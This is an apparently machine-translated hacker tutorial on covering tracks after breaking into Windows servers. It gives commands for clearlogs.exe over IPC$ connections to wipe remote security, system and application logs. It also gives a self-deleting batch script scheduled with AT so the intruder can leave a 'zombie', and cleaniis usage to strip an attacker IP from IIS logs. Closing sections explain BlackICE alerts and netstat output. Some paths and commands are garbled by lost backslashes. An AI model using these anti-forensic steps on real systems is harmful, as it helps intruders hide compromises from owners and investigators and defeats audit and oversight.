Clean your ass-clear intrusion logs

Application logs,
Security logs,
System logs,

Default DNS log location: % SystemRoot % system32config. The default file size is kb, Which is changed by the Administrator. Security log file: % SystemRoot % system32configsecevent. EVT
System log file: % SystemRoot % system32configsysevent. EVT
Application Log File: % SystemRoot % system32configappevent. EVT
Default FTP Log location: % SystemRoot % system32logfilesmsftpsvc1, one
Default location of WWW logs: % SystemRoot % system32logfilesw3svc1. One log is generated every day by default.

Keys of the above logs in the Registry: application logs, security logs, system logs, DNS server logs,
These log files are in the registry:
Hkey_local_machinesystemcurrentcontrolsetserviceseventlog

Key (indicating success) and lock (indicating that the user is stopped by the system when doing something ). Four lock icons indicate four failed reviews. The event types are account logon, logon, and logout failures.

How to delete these logs: based on the preceding information, we know that a log file is usually protected by a service in the background, except for system logs, security logs, and application logs, their service is a key process of ipvs2000, and it is in the same area as the registry file. When Windows2000 is started, the service is started to protect these files, so it is difficult to delete them.

The following are difficult security logs and system logs. The service that protects these logs is Event Logs. Try to stop them! D: serversystem32logfilesw3svc1> net stop EventLog this service cannot accept the "Suspend" or "stop" request operation.
How to clear system logs
How to use tools to clear IIS logs
How to clear history and cookies
How to view BlackICE logs
What does netstat-An mean?

==========================================
1. It is difficult to clear system logs manually. Here we will introduce clearlog.exe, a tool

Usage:
Usage: clearlogs [\ computername] <-APP/-sec/-sys>

-APP = application logs
-Sec = Security Log
-Sys = System Log
A. logs of remote computers can be cleared.
** Use IPC to connect to: net use \ ipipc $ password/User: User Name
** Then start clearing: Method
Clearlogs \ IP-app: clears application logs of remote computers.
Clearlogs \ IP-sec, which is used to clear the security logs of remote computers.
Clearlogs \ IP-SYS: clears system logs of remote computers.

B. Clear local logs: if it cannot be empty with a remote computer. Then you need to upload the tool to the remote computer and then clear it. Method:

Clearlogs-app: clears application logs of remote computers.
Clearlogs-sec: This is used to clear the security logs of remote computers.
Clearlogs-SYS: This is used to clear system logs of remote computers.

The security log has been cleared. Success: the log has been cleared is successful.

To be more secure, you can also create a batch file. Run the AT command to create a scheduled task and run it automatically. Then, you can leave your zombie.
For example, create a C. bat

Rem ================================ start
@ Echo off
Clearlogs-app
Clearlogs-Sec
Clearlogs-sys
Del clearlogs.exe
Del C. bat
Exit
Rem ================================ end

When testing on your computer, do not display @ echo off. You can see the result
The first line indicates that the window is not displayed during running.
The second line indicates clearing application logs.
The third line indicates clearing security logs.
The fourth line indicates clearing system logs.
Indicates that clearlogs.exe is deleted.
The sixth line indicates: Delete the c. bat batch file.
Row 7 indicates exit

Use the AT command to create a scheduled task. This command is available in both the original tutorial and magazine. You can check the detailed usage

At time C: C. bat

Then you can safely leave, so that you can be more secure.
2. Clear IIS logs:
Tool: cleaniis.exe
Usage:
Iisantidote <logfile dir> <IP or string to hide>
Iisantidote <logfile dir> <IP or string to hide> stop
Stop opiton will stop IIs before clearing the files and restart it after
<Logfile dir> Exemple: C: winntsystem32logfilesw3svc1 dont forget

Usage explanation:
Cleaniis.exe path clearing parameters for IIS log storage

What does it mean ?? Let me give you an example:
Cleaniis C: winnt system32logfilesw3svc1 192.168.0.1
This indicates clearing all access records of this IP address (192.168.0.1) in the log. This method is recommended.

Cleaniis C: winntsystem32logfilesw3svc1/shop/admin/
This indicates clearing the logs in this directory.

C: winntsystem32logfilesw3svc1 indicates that the path of IIS logs (Windows NT/2000) can be changed.
C: windowssystem32logfilesw3svc1 indicates that the path of IIS logs (Windows XP/2003) can be changed.

This test indicates that the IP address is not in the log. Let's take a look at the Log Path. Then we can see that our IP address (192.168.0.1) is no longer available and has all been cleared.

You can also create a batch processing method, which is the same as above.

==========================================
3. Clear history and running logs:
Cleaner.exe
Run it directly.

==========================================
4. View BlackICE logs.
Here we can clear the logs of the firewall.

This indicates that an email attachment with a virus has been sent. The IP address is 220.184.153.116.
Tcp_probe_other indicates scanning through TCP or establishing a connection with you using other methods.
This indicates scanning IIS through port 80

Virus Nimda
This requires a lot of knowledge about computer protocols and an understanding of English. If you are not good at English, you can build a Kingsoft Mac. Generally, some of them can be ignored.

Generally, you do not need to worry about these three cases. At the top of the critical, you can pay attention to it. Generally, other computers Do scan or intrude into your computer.

Count indicates the number of times the intruder is the IP address of the other party. The way (Protocol) the event is scanned or the time to be intruded indicates the time.

5. ==========================================
What does netstat-An mean?
Use this command to view all connections to the local machine.

PROTO local address foreign address State
Protocol local port and IP address remote port and IP address status

The listening status indicates waiting for the other party to connect.

Established is connected. The TCP protocol is TCP

The UDP protocol is UDP.

TCP 192.168.0.10: 1115 61.186.97.54: 80 established
This indicates that the TCP local IP address (192.168.0.10) is used to connect to the remote IP address through Port: 1115 (61.186.97.54) and Port 80 (61.186.97.54 ).
Port 80 indicates that HTTP is the website you are visiting.

Generally, port 80 21 8000 of the remote IP address is normal. If it is another port, you can check your computer.

Clean your ass-clear intrusion logs